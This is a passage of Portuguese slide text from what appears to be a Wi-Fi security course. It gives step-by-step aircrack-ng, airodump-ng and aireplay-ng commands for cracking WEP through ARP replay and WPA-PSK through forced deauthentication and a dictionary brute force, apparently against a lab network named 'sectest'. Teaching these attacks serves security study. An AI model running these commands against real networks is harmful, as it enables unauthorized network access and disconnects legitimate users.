  • 81. Ataques 2 – Quebra de WEP via software Passos: 4. em outro terminal – captura do tráfego cifrado de uma rede específica para posterior análise # airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1 wlan0 5. para diminuir tempo, geração de tráfego (requisição de autenticação com o AP) # aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0
  • 82. Ataques 2 – Quebra de WEP via software Passos: 6. captura da requisição de autenticação (os pacotes ARP) e repetição dos mesmos para geração de mais tráfego # aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0 7. Após obter um número significativo de pacotes, tentar a análise... # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
  • 83. Ataques 2 – Quebra de WEP via software Obs: necessário grande volume de tráfego para análise... porém, com tráfego suficiente, sempre se consegue o segredo compartilhado
  • 84. Ataques 3 – Quebra de WPA via software Vulnerabilidade: Mesmo protocolo de autenticação do WEP quando utilizado PSK Técnica: Obtenção dos quadros de associação e posterior força bruta na PSK
  • 85. Ataques 3 – Quebra de WPA via software Passos: 1. colocar a placa de rede em modo monitor 2. monitorar com airodump-ng 3. captura de pacotes cifrados (especificar WPA) # airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
  • 86. Ataques 3 – Quebra de WPA via software Passos: 4. força a desautenticação de um cliente para captura dos quadros de autenticação (falsifica mensagem de desaut. do AP) # aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0 5. utiliza força bruta (dicionário) para tentar obter PSK # aircrack-ng -w dicionario.txt wpa1-01.cap